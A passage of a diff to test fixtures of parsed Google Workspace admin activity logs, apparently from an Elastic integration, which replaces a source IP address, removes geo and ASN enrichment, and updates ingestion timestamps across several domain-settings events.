"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"GENERATE_TRANSFER_TOKEN\"}}", + "ingested": "2021-12-09T13:38:31.916015800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"GENERATE_TRANSFER_TOKEN\"}}", "provider": "admin", "action": "GENERATE_TRANSFER_TOKEN", "id": "1", @@ -4025,7 +3143,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4049,35 +3167,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091381900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_BACKGROUND_COLOR\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.916021100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_BACKGROUND_COLOR\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_LOGIN_BACKGROUND_COLOR", "id": "1", @@ -4107,7 +3207,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4131,35 +3231,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091384800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_BORDER_COLOR\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.916024800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_BORDER_COLOR\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_LOGIN_BORDER_COLOR", "id": "1", @@ -4189,7 +3271,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4213,35 +3295,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091387500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_ACTIVITY_TRACE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.916029400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_LOGIN_ACTIVITY_TRACE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_LOGIN_ACTIVITY_TRACE", "id": "1", @@ -4271,7 +3335,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4295,35 +3359,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091390200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"PLAY_FOR_WORK_ENROLL\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_MDM_VENDOR_NAME\",\"value\":\"vendor\"},{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}", + "ingested": "2021-12-09T13:38:31.916035400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"PLAY_FOR_WORK_ENROLL\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_MDM_VENDOR_NAME\",\"value\":\"vendor\"},{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}", "provider": "admin", "action": "PLAY_FOR_WORK_ENROLL", "id": "1", @@ -4353,7 +3399,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4377,35 +3423,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091393Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"PLAY_FOR_WORK_UNENROLL\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_MDM_VENDOR_NAME\",\"value\":\"vendor\"}]}}", + "ingested": "2021-12-09T13:38:31.916041800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"PLAY_FOR_WORK_UNENROLL\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_MDM_VENDOR_NAME\",\"value\":\"vendor\"}]}}", "provider": "admin", "action": "PLAY_FOR_WORK_UNENROLL", "id": "1", @@ -4435,7 +3463,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4459,35 +3487,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091395700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"MX_RECORD_VERIFICATION_CLAIM\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.916047Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"MX_RECORD_VERIFICATION_CLAIM\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MX_RECORD_VERIFICATION_CLAIM", "id": "1", @@ -4517,7 +3527,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4541,35 +3551,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091399800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_NEW_APP_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:31.916050900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_NEW_APP_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_NEW_APP_FEATURES", "id": "1", @@ -4600,7 +3592,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4624,35 +3616,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091402800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_USE_NEXT_GEN_CONTROL_PANEL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:31.916055700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_USE_NEXT_GEN_CONTROL_PANEL\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_USE_NEXT_GEN_CONTROL_PANEL", "id": "1", @@ -4683,7 +3657,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4707,35 +3681,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091405700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPLOAD_OAUTH_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.916061200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"UPLOAD_OAUTH_CERTIFICATE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "UPLOAD_OAUTH_CERTIFICATE", "id": "1", @@ -4765,7 +3721,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4789,35 +3745,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091408700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REGENERATE_OAUTH_CONSUMER_SECRET\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.916066300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REGENERATE_OAUTH_CONSUMER_SECRET\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "REGENERATE_OAUTH_CONSUMER_SECRET", "id": "1", @@ -4847,7 +3785,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4871,35 +3809,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091417300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OPEN_ID_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:31.916070300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OPEN_ID_ENABLED\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_OPEN_ID_ENABLED", "id": "1", @@ -4930,7 +3850,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -4954,35 +3874,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091420400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ORGANIZATION_NAME\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.916075100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_ORGANIZATION_NAME\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_ORGANIZATION_NAME", "id": "1", @@ -5012,7 +3914,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5036,35 +3938,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091423Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OUTBOUND_RELAY\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:31.916078800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OUTBOUND_RELAY\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "TOGGLE_OUTBOUND_RELAY", "id": "1", @@ -5095,7 +3979,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -5119,35 +4003,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091425700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PASSWORD_MAX_LENGTH\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.916083500Z", + "original": 